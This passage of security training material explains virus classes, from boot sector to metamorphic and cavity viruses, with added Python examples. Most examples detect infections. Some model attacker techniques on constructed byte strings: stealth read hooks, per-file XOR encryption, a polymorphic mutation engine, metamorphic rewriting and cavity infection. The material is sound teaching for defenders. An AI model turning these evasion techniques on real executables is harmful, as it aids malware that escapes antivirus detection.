The system sector consists of 512 bytes of memory. Because of this, system sector viruses conceal their code in some other disk space. The main carrier of system sector viruses is the floppy disk. These viruses generally reside in the memory. They can also be caused by Trojans. Some sector viruses also spread through infected files, and they are called multipart viruses.
FIGURE 7.6: System or Boot Sector Viruses (before infection / after infection: virus code placed in the MBR)
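To show what a 512-byte system sector contains and how a boot sector infection looks next to a known-clean baseline, here is an added Python example that is not part of the original courseware. It builds a constructed MBR image (the boot code bytes are stand-ins, not real boot code), parses the partition table and the 0x55AA signature, and compares the boot-code hash against a baseline; the constructed "after infection" image keeps the partition table and only swaps the boot code, which is why such a system still boots.

```python
import hashlib
import struct

MBR_SIZE = 512                 # the system sector the text describes is 512 bytes
BOOT_CODE_LEN = 446            # bytes 0..445 hold the executable boot code
PARTITION_TABLE_OFF = 446      # four 16-byte partition entries follow the code
BOOT_SIGNATURE = b"\x55\xAA"   # bytes 510..511
ENTRY_FMT = "<B3sB3sII"        # status, CHS start, type, CHS end, LBA start, sector count

# Constructed boot code stand-ins; no real MBR code is reproduced here.
CLEAN_BOOT_CODE = b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 24
VIRUS_BOOT_CODE = b"\xEB\x3C\x90" + b"BOOT-VIRUS-STUB"   # constructed "after infection" code


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed 512-byte MBR: boot code, one bootable partition, 0x55AA signature."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    # status 0x80 = bootable, type 0x07 = NTFS, starting at LBA 2048, 1 GiB of sectors
    entry = struct.pack(ENTRY_FMT, 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 2097152)
    table = entry + b"\x00" * 48      # remaining three entries left empty
    return code + table + BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> dict:
    """Split a raw sector into signature check, boot-code hash and partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFF + 16 * i
        status, _, ptype, _, lba_start, count = struct.unpack(ENTRY_FMT, sector[off:off + 16])
        if ptype != 0:
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr(sector: bytes, baseline_boot_code_sha256: str) -> list:
    """Findings against a baseline taken from the known-clean sector; empty list = clean."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline (possible boot sector virus)")
    if not any(p["bootable"] for p in info["partitions"]):
        findings.append("no partition is flagged bootable")
    return findings


CLEAN_MBR = build_sample_mbr(CLEAN_BOOT_CODE)
INFECTED_MBR = build_sample_mbr(VIRUS_BOOT_CODE)
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]

if __name__ == "__main__":
    print("clean:", check_mbr(CLEAN_MBR, BASELINE))
    print("infected:", check_mbr(INFECTED_MBR, BASELINE))
    print("partition table intact:",
          parse_mbr(INFECTED_MBR)["partitions"] == parse_mbr(CLEAN_MBR)["partitions"])
```

The baseline hash must come from a sector captured before deployment (or from the installer's known MBR), since the check only tells you that the boot code changed, not what it changed into.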
File and Multipartite Viruses
File Viruses: File viruses infect files that are executed or interpreted in the system such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses mainly target a range of operating systems that include Windows, UNIX, DOS, and Macintosh.

Characterizing File Viruses: File viruses are mainly characterized and described based on their physical behavior or characteristics. One way to classify a file virus is by the type of file targeted by it, such as EXE or COM files, the boot sector, etc. A file virus can also be characterized based on how it infects the targeted file (also known as the host file):

- Prepending: writes itself into the beginning of the host file's code
- Appending: writes itself to the end of the host file
- Overwriting: overwrites the host file's code with its own code
- Inserting: inserts itself into gaps inside the host file's code

File viruses are also classified based on whether they are non-memory resident or memory resident. Non-memory resident viruses search for EXE files on a hard drive and then infect them, whereas memory resident viruses stay actively in memory and trap one or more system functions. File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. The main virus code is decrypted by the decryptor before it starts. An encrypted virus usually uses variable or fixed key decryptors, whereas polymorphic viruses have decryptors that are randomly generated from processor instructions and that consist of a lot of commands that are not used in the decryption process.

Execution of Payload:

- Direct action: Immediately upon execution
- Time bomb: After a specified period of time
- Condition triggered: Only under certain conditions

Multipartite Viruses: A multipartite virus is also known as a multi-part virus that attempts to attack both the boot sector and the executable or program files at the same time. When the virus is attached to the boot sector, it will in turn affect the system files, and then the virus attaches to the files, and this time it will in turn infect the boot sector.
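The infection styles just listed (prepending, appending, overwriting, inserting into gaps), together with the add-on, cavity and file-extension types from the Types of Viruses overview, can be told apart by comparing a file with a known-good copy. The Python below is an added example, not courseware code: `HOST`, `VIRUS` and the infected variants are constructed byte strings, and `classify_change`, `hides_executable_extension` and `audit` are names chosen for this example.

```python
# Extensions the text lists as infectable program/script types (lower-case for matching).
EXECUTABLE_EXTENSIONS = {"com", "exe", "sys", "ovl", "obj", "prg", "mnu", "bat", "vbs"}

# Constructed stand-in for a clean host program: a header, code, a 16-byte run of
# zero padding (the "empty space" a cavity virus looks for) and a trailer.
HOST = b"MZ" + b"\x90" * 40 + b"\x00" * 16 + b"HOSTCODE"
VIRUS = b"VIRUS!"  # constructed marker standing in for the virus code


def classify_change(baseline: bytes, current: bytes) -> str:
    """Name the infection style implied by how a file's bytes differ from its
    known-good copy: prepending, appending, inserting, cavity or overwriting."""
    if current == baseline:
        return "unchanged"
    if len(current) > len(baseline):
        if current.endswith(baseline):
            return "prepending"      # virus code ahead of the intact host (add-on style)
        if current.startswith(baseline):
            return "appending"       # intact host followed by virus code
        return "inserting"           # host split and virus code placed inside
    if len(current) == len(baseline):
        changed = [i for i in range(len(baseline)) if baseline[i] != current[i]]
        if all(baseline[i] == 0 for i in changed):
            return "cavity"          # only former zero padding was filled; size unchanged
        return "overwriting"         # real host bytes were replaced in place
    return "truncated"


def hides_executable_extension(name: str) -> bool:
    """BAD.TXT.VBS displays as BAD.TXT when extensions are hidden; flag such names."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTENSIONS


def audit(baseline: dict, current: dict) -> dict:
    """Compare two snapshots {name: bytes}; report changed/new files and deceptive names."""
    report = {}
    for name, data in current.items():
        notes = []
        if name not in baseline:
            notes.append("new file")
        else:
            kind = classify_change(baseline[name], data)
            if kind != "unchanged":
                notes.append(kind)
        if hides_executable_extension(name):
            notes.append("double extension hides script type")
        if notes:
            report[name] = "; ".join(notes)
    return report


# Constructed infected variants of HOST, one per infection style described in the text.
PREPENDED = VIRUS + HOST
APPENDED = HOST + VIRUS
INSERTED = HOST[:10] + VIRUS + HOST[10:]
CAVITY = HOST[:42] + b"VIRUSCODE".ljust(16, b"\x00") + HOST[58:]
OVERWRITTEN = VIRUS + HOST[len(VIRUS):]

if __name__ == "__main__":
    before = {"GAME.EXE": HOST, "TOOL.COM": HOST, "NOTES.TXT": b"plain text"}
    after = {"GAME.EXE": APPENDED, "TOOL.COM": CAVITY, "NOTES.TXT": b"plain text",
             "BAD.TXT.VBS": b"WScript.Echo 1"}
    for name, finding in audit(before, after).items():
        print(f"{name}: {finding}")
```

The cavity case is the one a size-only integrity check misses: the file length is unchanged because the virus filled existing zero padding, so the comparison has to be on content, not on size.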
Macro Viruses

- Infects macro-enabled documents
- Most macro viruses are written using the macro language Visual Basic for Applications (VBA)

Slide figure labels: Attacker, User.

Microsoft Word or similar applications can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else. Most macro viruses are written using the macro language Visual Basic for Applications (VBA) and they infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Macro viruses are somewhat less harmful than other types. They are usually spread via an email. Pure data files do not allow the spread of viruses, but sometimes the line between a data file and an executable file is easily overlooked by the average user due to the extensive macro languages in some programs. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only in cases where the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit common programs with macro capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code. In addition, the latest exploited macro code exists in the full version of the Acrobat program that reads and writes PDF files.
Cluster Viruses

Slide figure labels: Virus, Copy, Launch Itself.

Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program. When a program runs under DOS, it first loads and executes the virus code, and then the virus locates the actual program and executes it. Dir-2 is an example of this type of virus. Cluster viruses modify directory table entries so that directory entries point to the virus code. There is only one copy of the virus on the disk infecting all the programs in the computer system. It will launch itself first when any program on the computer system is started and then the control is passed to the actual program.
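Because a cluster virus leaves a single copy of its code on disk and repoints every program's directory entry at it, the observable artifact (when the directory is read without the virus resident, for example from a clean boot disk) is many executables sharing one starting cluster. The Python below is an added example, not part of the courseware; the directory table and cluster numbers are constructed, and `find_cross_linked_programs` is a name chosen here.

```python
# Constructed FAT-style directory table: (file name, starting cluster, size in bytes).
# After a cluster virus has rewritten the starting-cluster field of each program's
# entry, all of them point at the one on-disk copy of the virus (cluster 2 here);
# data files are left alone.
SAMPLE_DIRECTORY = [
    ("COMMAND.COM", 2, 47845),
    ("EDIT.EXE", 2, 413),        # constructed: pointed at cluster 120 before infection
    ("FORMAT.COM", 2, 22717),
    ("README.TXT", 35, 1024),
    ("CONFIG.SYS", 36, 128),
]

EXECUTABLE_EXTENSIONS = {"COM", "EXE"}


def extension_of(name: str) -> str:
    return name.rsplit(".", 1)[-1].upper() if "." in name else ""


def find_cross_linked_programs(entries) -> dict:
    """Group executable entries by starting cluster and return only the clusters that
    more than one program claims as its first cluster. A healthy directory has no
    such sharing, because every file owns its own cluster chain."""
    by_cluster = {}
    for name, start_cluster, _size in entries:
        if extension_of(name) in EXECUTABLE_EXTENSIONS:
            by_cluster.setdefault(start_cluster, []).append(name)
    return {c: names for c, names in by_cluster.items() if len(names) > 1}


if __name__ == "__main__":
    for cluster, names in find_cross_linked_programs(SAMPLE_DIRECTORY).items():
        print(f"cluster {cluster} is the start of {len(names)} programs: {', '.join(names)}")
```

The check is only meaningful on a directory read without the virus resident; with the virus active, its hooks present the original cluster numbers and the table looks normal, which is the stealth behaviour covered next.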
Stealth/Tunneling Viruses
Stealth/Tunneling Viruses

Stealth viruses evade antivirus software by intercepting its requests to the operating system. When the scanner asks to read an infected file, the virus's hook services the request instead of the OS and returns an uninfected version of the file, so the file appears "clean".

The classic stealth virus does this by hooking the service-call interrupts it cares about (on DOS, the INT 21h file functions) while it is running; requests made through those interrupts are redirected into virus code, which reports false information to hide its presence. It conceals the modifications it has made: it reports the original file size rather than the grown one, and it may disinfect a file on the fly when the file is opened for reading and reinfect it when the file is closed, so a scanner that reads through the hooked path only ever sees the stored, uninfected image. It takes control of the system functions that read files or system sectors and, when another program requests data that the virus has already modified, serves the pre-modification data to the requesting program. A stealth virus is memory resident: it must stay loaded to keep its hooks in place, and it hides by taking over system functions rather than by obfuscating its own code.

Rootkits are the common carrier of stealth behaviour today. A rootkit, usually installed by a Trojan, hooks the file-system, registry and process APIs in the same way and can therefore hide any malware, not just a virus. The practical counter is the same in both cases: do not trust the view the infected system gives you. Compare what the API reports with what is actually on disk (a cross-view check), or scan the disk from clean boot media where the hooks are not loaded.

Tunneling viruses attack the defence from the other side. Interceptor programs (behaviour blockers) monitor operating-system requests by installing their own hooks; a tunneling virus traces the interrupt chain down to the original BIOS or DOS handler and calls it directly, installing itself underneath the monitor. In effect it tunnels under the antivirus software so that its file writes are never seen by the monitoring hooks.
Figure: a stealth virus intercepting the antivirus scanner's request for the system file TCPIP.SYS ("Give me the system file tcpip.sys") and answering with the original, uninfected TCPIP.SYS ("Here you go").
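The cross-view check described above, as an added example that is not part of the CEH material: a toy stealth hook that answers read requests for the files it has infected with their pre-infection image, a signature scanner that is fooled when it reads through the hook, and a detector that compares the hooked view with the raw view. The file contents and the marker string are constructed for the demonstration.

```python
"""Cross-view detection against a stealth hook.

Added example, not part of the CEH material. The 'file system' is a dict of
constructed byte strings; StealthHook stands in for a virus that has hooked
the OS read routine and serves the pre-infection image of the files it has
infected; cross_view_scan is the defender's check that compares the hooked
(API) view with the raw on-disk view.
"""
import hashlib

# constructed sample files: name -> bytes
RAW_FS = {
    "notepad.exe": b"MZ" + b"\x90" * 40 + b"ORIGINAL_NOTEPAD_CODE",
    "calc.exe": b"MZ" + b"\x90" * 40 + b"ORIGINAL_CALC_CODE",
    "readme.txt": b"just a text file",
}
MARKER = b"[STEALTH-VIRUS]"  # hypothetical virus body, what a signature would look for


class StealthHook:
    """Hooked read()/size(): infected files are reported with their original
    contents and length; everything else passes straight through to 'the OS'."""

    def __init__(self, fs):
        self.fs = fs
        self.clean_copies = {}  # name -> bytes as they were before infection

    def infect(self, name):
        self.clean_copies[name] = self.fs[name]
        self.fs[name] = self.fs[name] + MARKER  # the file on disk grows

    def read(self, name):
        if name in self.clean_copies:  # lie about files the virus touched
            return self.clean_copies[name]
        return self.fs[name]

    def size(self, name):
        return len(self.read(name))


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def signature_scan(read_fn, names, marker=MARKER):
    """Signature scan through whatever read() routine we are handed."""
    return sorted(n for n in names if marker in read_fn(n))


def cross_view_scan(hook, raw_fs):
    """Files whose API view (hash or size) disagrees with the raw on-disk view.
    A mismatch means something between the scanner and the OS is rewriting
    answers, which is exactly what a stealth virus or rootkit does."""
    hidden = []
    for name, raw_bytes in raw_fs.items():
        if sha256(hook.read(name)) != sha256(raw_bytes) or hook.size(name) != len(raw_bytes):
            hidden.append(name)
    return sorted(hidden)


def demo():
    fs = dict(RAW_FS)
    hook = StealthHook(fs)
    hook.infect("notepad.exe")
    via_hooked_api = signature_scan(hook.read, fs)       # the hook hides the marker
    via_raw_disk = signature_scan(lambda n: fs[n], fs)   # a raw read sees it
    via_cross_view = cross_view_scan(hook, fs)           # and so does the comparison
    return via_hooked_api, via_raw_disk, via_cross_view


if __name__ == "__main__":
    print(demo())  # ([], ['notepad.exe'], ['notepad.exe'])
```

The scanner that trusts the hooked API reports nothing; the raw read and the cross-view comparison both flag notepad.exe. On a real system the "raw view" is obtained by reading the volume below the hooked layer or by booting from clean media.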
Encryption Viruses

This type of virus uses simple encryption to encipher its code. An infected file carries two parts: a small decryption module, which stays constant, and an encrypted copy of the virus body, which is enciphered with a different key for each infected file. The key (or a seed from which it is derived) is stored with the decryptor so that the body can be recovered at run time. The most common scheme is to XOR each byte of the body with a randomized key byte, generated fresh at each infection and written into the newly infected file.

Because the body's bytes change with the key, an antivirus scanner cannot detect these viruses directly by matching a signature against the body. The decryption module, however, is the same in every copy, so a signature on the decryptor does work, and that is how these viruses are caught. A single-byte XOR key is also weak in the cryptographic sense: there are only 256 candidates, so a scanner or analyst can simply try them all and signature-match the decrypted result. Polymorphic viruses (next) exist precisely because the constant decryptor is such an easy target.
Figure: the same virus code as it appears in three infected files (Encryption Virus 1, 2 and 3), each enciphered with a different key; the decryptor is the part that does not change.
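A worked model of the above, added here and not part of the CEH material: a constant decryptor stub, a body XOR-ed with a per-file key byte, and the three checks a scanner can run against it. The stub text, the body text and the [stub][key][ciphertext] layout are assumptions made for the demonstration.

```python
"""Encryption virus model: constant decryptor stub, body XOR-ed with a
per-file key byte.

Added example, not part of the CEH material. DECRYPTOR_STUB, BODY and MARKER
are constructed stand-ins; the layout [stub][key][encrypted body] is an
assumption made for the demonstration.
"""
import os

DECRYPTOR_STUB = b"<decryptor: xor each body byte with key>"  # identical in every copy
BODY = b"VIRUS_BODY: find *.exe; infect; payload"           # the enciphered part
MARKER = b"VIRUS_BODY:"                                      # signature on the clear body


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def make_infected(body=BODY, key=None):
    """One infected file. A fresh key is drawn for every infection."""
    if key is None:
        key = os.urandom(1)[0]
    return DECRYPTOR_STUB + bytes([key]) + xor_bytes(body, key)


def body_signature_match(sample, marker=MARKER):
    """Signature on the body, applied to the raw file: fails, the body is enciphered."""
    return marker in sample


def stub_signature_match(sample, stub=DECRYPTOR_STUB):
    """Signature on the decryptor: the part that cannot change, so this works."""
    return stub in sample


def brute_force_xor(sample, marker=MARKER):
    """Recover the body without the key. A one-byte XOR key has 256 candidates;
    try each and keep the one that exposes the marker. Returns (key, body)."""
    ciphertext = sample[len(DECRYPTOR_STUB) + 1:]
    for key in range(256):
        candidate = xor_bytes(ciphertext, key)
        if marker in candidate:
            return key, candidate
    return None, None


def demo():
    a = make_infected(key=0x5A)
    b = make_infected(key=0xC3)
    return {
        "files_identical": a == b,
        "body_signature": (body_signature_match(a), body_signature_match(b)),
        "stub_signature": (stub_signature_match(a), stub_signature_match(b)),
        "recovered_keys": (brute_force_xor(a)[0], brute_force_xor(b)[0]),
        "recovered_body": brute_force_xor(a)[1] == BODY,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Two infections with different keys are byte-for-byte different files, the body signature misses both, the stub signature catches both, and the 256-key brute force recovers the body and the key from either file.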
Polymorphic Code

Polymorphic code is code that mutates while keeping the original algorithm intact. To produce it, the virus carries a polymorphic engine (also called a mutating or mutation engine) that emits a new, functionally equivalent decryptor for each infection. A well-written polymorphic virus therefore has no byte sequence that stays the same from one infection to the next, so there is nothing for a plain signature to match.

Figure: a polymorphic virus in RAM after the user runs an infected program; the decryptor routine decrypts the virus code and the encrypted mutation engine, which then generates a new polymorphic copy.

Polymorphic viruses modify their code for each replication in order to avoid detection. They do this by changing the encryption module and the instruction sequence of the decryptor: a random number generator drives the choice of keys, of equivalent instructions and of junk instructions, so that the mutation engine produces a different decryptor every time. Since the decryptor no longer contains fixed bytes, the scanner cannot key on it; the usual countermeasures are to emulate the suspect code in a sandbox until it has decrypted its own body (generic decryption) and then signature-match the decrypted body, or to recognise the mutation engine heuristically by the patterns of instructions it is able to generate. Slow polymorphic viruses change their decryptor only rarely (for example once a day or once per machine), so bait files infected during a single session all receive near-identical copies; an analyst who derives a signature from such samples gets one that misses the variants produced later. Because every infection changes the host file, a simple integrity checker that keeps baseline hashes of executables still detects the presence of a polymorphic virus on disk, whatever the decryptor looks like.
FIGURE 7.11: How Polymorphic Code Works. Components: encrypted mutation engine (EME), encrypted virus code and decryptor routine. The user runs an infected program; in RAM the decryptor routine decrypts the virus code and the mutation engine, the virus instructs the mutation engine to emit a new randomized decryptor, and the virus does the damage.
Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine and the mutation engine. The decryptor routine's job is to decrypt the virus code, and it does so only after it has taken control of the computer. The mutation engine generates randomized decryption routines; the decryption routine varies every time a new program is infected by the virus. In a polymorphic virus both the mutation engine and the virus code are encrypted, so only the decryptor is ever in the clear on disk. When the user runs a program infected with a polymorphic virus, the decryptor routine takes control of the system and then decrypts the virus code and the mutation engine. Control then passes from the decryptor to the virus, which locates a new program to infect. In RAM the virus makes a replica of itself and of the mutation engine, and then instructs the mutation engine to generate a new randomized decryption routine, which has the capability of
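The mutation engine and the emulation-based countermeasure described above, as an added example that is not part of the CEH material. It goes one step beyond the text: the decryptor is a small program in a constructed instruction set (xor/add/sub/rol on each byte), the engine emits a different inverse program with junk instructions for every infection, and the scanner recovers the body by running that program in a tiny emulator instead of matching bytes. The instruction set, the body text and the sample layout are assumptions made for the demonstration.

```python
"""Polymorphic decryptor mutation and emulation-based (generic) decryption.

Added example, not part of the CEH material. The instruction set (xor/add/
sub/rol/ror/nop on one byte), the text serialization of the decryptor and the
sample layout [decryptor text]\n[ciphertext] are constructed for the demo.
"""
import random

BODY = b"VIRUS_BODY: find targets; infect; payload"
MARKER = b"VIRUS_BODY:"
OPS = ("xor", "add", "sub", "rol")
INVERSE = {"xor": "xor", "add": "sub", "sub": "add", "rol": "ror"}


def apply_op(byte, op, arg):
    """Execute one mini-VM instruction on one byte."""
    if op == "xor":
        return byte ^ arg
    if op == "add":
        return (byte + arg) & 0xFF
    if op == "sub":
        return (byte - arg) & 0xFF
    if op == "rol":
        return ((byte << arg) | (byte >> (8 - arg))) & 0xFF
    if op == "ror":
        return ((byte >> arg) | (byte << (8 - arg))) & 0xFF
    if op == "nop":
        return byte
    raise ValueError(op)


def run_program(program, data):
    """Emulate 'program' over every byte of 'data'."""
    out = bytearray()
    for b in data:
        for op, arg in program:
            b = apply_op(b, op, arg)
        out.append(b)
    return bytes(out)


def mutation_engine(rng):
    """Draw a random encryption sequence and build its inverse decryptor,
    reversed and padded with junk nops. Sequences that leave MARKER unchanged
    (e.g. add 3 / sub 3) are rejected so the ciphertext never carries the
    clear signature."""
    while True:
        enc = []
        for _ in range(rng.randrange(2, 5)):
            op = rng.choice(OPS)
            enc.append((op, rng.randrange(1, 8) if op == "rol" else rng.randrange(1, 256)))
        if run_program(enc, MARKER) != MARKER:
            break
    dec = [(INVERSE[op], arg) for op, arg in reversed(enc)]
    for _ in range(rng.randrange(1, 4)):
        dec.insert(rng.randrange(len(dec) + 1), ("nop", rng.randrange(256)))
    return enc, dec


def serialize(program):
    return ";".join(f"{op} {arg}" for op, arg in program).encode()


def parse(blob):
    return [(tok.split()[0], int(tok.split()[1])) for tok in blob.decode().split(";")]


def infect(rng, body=BODY):
    """One infected sample: a decryptor no other sample shares, followed by the
    body enciphered so that exactly this decryptor undoes it."""
    enc, dec = mutation_engine(rng)
    return serialize(dec) + b"\n" + run_program(enc, body)


def decryptor_of(sample):
    return sample.split(b"\n", 1)[0]


def generic_decryption_scan(sample, marker=MARKER):
    """Emulate the sample's own decryptor over its ciphertext, then signature
    match the result. Nothing about the decryptor's bytes is assumed."""
    dec_blob, ciphertext = sample.split(b"\n", 1)
    plaintext = run_program(parse(dec_blob), ciphertext)
    return marker in plaintext, plaintext


def demo(seed=7):
    rng = random.Random(seed)
    s1, s2 = infect(rng), infect(rng)
    return {
        "decryptors_differ": decryptor_of(s1) != decryptor_of(s2),
        "raw_signature": (MARKER in s1, MARKER in s2),
        "emulated_signature": (generic_decryption_scan(s1)[0], generic_decryption_scan(s2)[0]),
        "recovered_body": generic_decryption_scan(s1)[1] == BODY,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Neither sample shares decryptor bytes with the other and neither contains the clear signature, yet the emulator recovers the identical body from both. Real engines vary register choice, instruction order and loop structure rather than a text program, and real scanners bound the emulation by instruction count so that a decryptor cannot simply out-wait them.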
Metamorphic Viruses

Metamorphic code can reprogram itself: it translates its own code into a temporary representation, edits that representation, and then generates a fresh copy of the code from it, so that every generation is written differently.

Some viruses rewrite themselves in this way each time they infect a newly executed file. Such viruses are complex and carry a metamorphic engine to do the rewriting. Code that can reprogram itself is called metamorphic code. The code is translated into a temporary (intermediate) form and then converted back into normal code, with the original algorithm left intact; the technique exists to defeat the pattern recognition that antivirus software relies on. Unlike a polymorphic virus, a metamorphic virus has no constant decryptor and no encrypted body at all, so the whole virus differs from copy to copy; that is what makes it more effective than polymorphic code against signature scanning. The price is a large and intricate code base, most of which is the engine rather than the payload. Detection works by normalizing: the scanner strips junk instructions, undoes register renaming and instruction substitution, and compares the canonical result against a family signature, or it profiles the behaviour of the running code instead of its bytes.

Commonly cited metamorphic viruses:

Win32/Simile: Written in assembly language and targeted at Microsoft Windows. Its metamorphic process is complex, and roughly 90% of the virus's code is the metamorphic engine itself.

Zmist: Also known as Zombie.Mistfall (from the Mistfall engine by the virus writer Z0mbie), Zmist is the first virus to use the technique called "code integration": it disassembles the host, inserts its own code between the host's instructions, regenerates the code and rebuilds the executable, so the virus is scattered through the host rather than attached to one end of it.
FIGURE 7.12: Metamorphic Viruses Screenshot. Four generations of the same virus: a.) Variant A, b.) Variant B, c.) the "unofficial" Variant C, d.) the .D variant (which was the "official" C of the original author). The visible identification string is rendered differently in each.
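The normalizing detection described above, as an added example that is not part of the CEH material: a toy metamorphic engine that rewrites a constructed pseudo-assembly body by renaming registers, substituting equivalent instructions and inserting junk, and a normalizer that undoes all three so that a family signature becomes a plain list comparison. The instruction set and the body are constructed for the demonstration.

```python
"""Metamorphic rewriting and normalization-based detection.

Added example, not part of the CEH material. ORIGINAL is a constructed
pseudo-assembly 'virus body'; metamorph() plays the metamorphic engine
(register permutation, equivalent-instruction substitution, junk insertion);
normalize() is the scanner's inverse step, after which a family signature is
a plain comparison.
"""
import random
import re

REGS = ("eax", "ebx", "ecx", "edx")
REG_RE = re.compile(r"\b(eax|ebx|ecx|edx)\b")
INSN_RE = re.compile(r"(\w+) (\w+)(?:, (\w+))?$")

ORIGINAL = [  # constructed body
    "mov eax, 0",
    "add eax, 1",
    "mov ebx, 0x401000",
    "sub ecx, 1",
    "call infect",
]


def _rename(line, mapping):
    return REG_RE.sub(lambda m: mapping[m.group(1)], line)


def metamorph(program, rng):
    """One generation: permute register names consistently, swap some
    instructions for equivalents, and sprinkle junk with no net effect."""
    perm = list(REGS)
    rng.shuffle(perm)
    mapping = dict(zip(REGS, perm))
    out = []
    for line in program:
        line = _rename(line, mapping)
        m = INSN_RE.match(line)
        if m:
            op, a, b = m.groups()
            if op == "mov" and b == "0" and rng.random() < 0.5:
                line = f"xor {a}, {a}"
            elif op == "add" and b == "1" and rng.random() < 0.5:
                line = f"inc {a}"
            elif op == "sub" and b == "1" and rng.random() < 0.5:
                line = f"dec {a}"
        if rng.random() < 0.5:
            out.append("nop")
        if rng.random() < 0.5:
            junk = rng.choice(REGS)
            out.extend([f"push {junk}", f"pop {junk}"])
        out.append(line)
    return out


def normalize(program):
    """Undo what the engine did: drop junk, expand shorthand to one canonical
    form, and name registers by order of first use so permutations collapse."""
    stripped = []
    for line in program:
        if line == "nop":
            continue
        if line.startswith("pop ") and stripped and stripped[-1] == "push " + line[4:]:
            stripped.pop()  # push X / pop X pair cancels out
            continue
        stripped.append(line)
    canon = []
    for line in stripped:
        m = INSN_RE.match(line)
        if m:
            op, a, b = m.groups()
            if op == "xor" and a == b:
                line = f"mov {a}, 0"
            elif op == "inc":
                line = f"add {a}, 1"
            elif op == "dec":
                line = f"sub {a}, 1"
        canon.append(line)
    mapping, result = {}, []
    for line in canon:
        for reg in REG_RE.findall(line):
            mapping.setdefault(reg, f"r{len(mapping)}")
        result.append(_rename(line, mapping))
    return result


FAMILY_SIGNATURE = normalize(ORIGINAL)  # what the scanner stores for the family


def matches_family(program):
    return normalize(program) == FAMILY_SIGNATURE


def demo(seed=3):
    rng = random.Random(seed)
    v1, v2 = metamorph(ORIGINAL, rng), metamorph(ORIGINAL, rng)
    return {
        "variants_identical": v1 == v2,
        "v1_detected": matches_family(v1),
        "v2_detected": matches_family(v2),
        "benign_detected": matches_family(["mov eax, 0", "call exit"]),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The two generations differ line by line, both normalize back to the stored family signature, and an unrelated program does not. Real engines also reorder independent instructions and split or merge basic blocks, which is why production scanners pair normalization with emulation and behaviour profiling.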
Cavity Viruses

A cavity virus overwrites a part of the host file that is filled with a constant (usually nulls) with its own code, without increasing the length of the file and while preserving the host's functionality. Executable formats routinely contain such cavities: section alignment padding, unused header space and zero-initialized data regions. Because the file length does not change, a "has the size changed?" check is useless against this class; an integrity checker must compare content hashes against a baseline, and a scanner can look for code where a clean build of the same file has padding.

Figure: cavity infection. Original file size: 45 KB; infected file size: 45 KB. The infected file keeps its length and its icon.
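An added example (not part of the CEH material) of the length-versus-hash point made above: a constructed host with a run of null padding, a toy infector that overwrites the padding in place, and the checks a defender would run against the result. The host layout and the payload are constructed.

```python
"""Cavity infection and why file length is not an integrity check.

Added example, not part of the CEH material: a constructed 'host' with a run
of null padding, a toy infector that overwrites that run in place, and the
checks a defender would run (length, then hash / null-run comparison).
"""
import hashlib


def build_host():
    """Constructed host file: header, code, a 64-byte block of nulls (what
    section alignment padding looks like in a real PE), then data."""
    return b"MZ-HEADER" + b"CODE" * 8 + b"\x00" * 64 + b"DATA" * 8


def find_cavities(data, min_len=16):
    """Return (offset, length) for every run of 0x00 at least min_len long."""
    runs, start = [], None
    for i, byte in enumerate(data + b"\x01"):  # sentinel closes a trailing run
        if byte == 0 and start is None:
            start = i
        elif byte != 0 and start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    return runs


def cavity_infect(data, payload):
    """Overwrite the first cavity large enough for the payload, in place.
    Returns None when no cavity fits (a cavity virus then skips the file)."""
    cavities = find_cavities(data, min_len=len(payload))
    if not cavities:
        return None
    offset, _ = cavities[0]
    return data[:offset] + payload + data[offset + len(payload):]


def length_check(before, after):
    """The check the cavity virus is designed to pass."""
    return len(before) == len(after)


def hash_check(before, after):
    """The check that actually works: baseline hash vs current hash."""
    return hashlib.sha256(before).digest() == hashlib.sha256(after).digest()


def cavities_shrunk(before, after, min_len=16):
    """Heuristic for when only a clean reference build is available: padding
    that was null in the reference should still be null."""
    return (sum(l for _, l in find_cavities(before, min_len))
            > sum(l for _, l in find_cavities(after, min_len)))


def demo():
    host = build_host()
    infected = cavity_infect(host, b"CAVITY-PAYLOAD-CODE")
    return {
        "cavities_before": find_cavities(host),
        "cavities_after": find_cavities(infected),
        "same_length": length_check(host, infected),
        "same_hash": hash_check(host, infected),
        "cavities_shrunk": cavities_shrunk(host, infected),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The infected file is exactly as long as the original, so the length check passes; the hash differs and the null run has shrunk from 64 bytes to 45, so both real checks fire.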
Sparse Infector Viruses

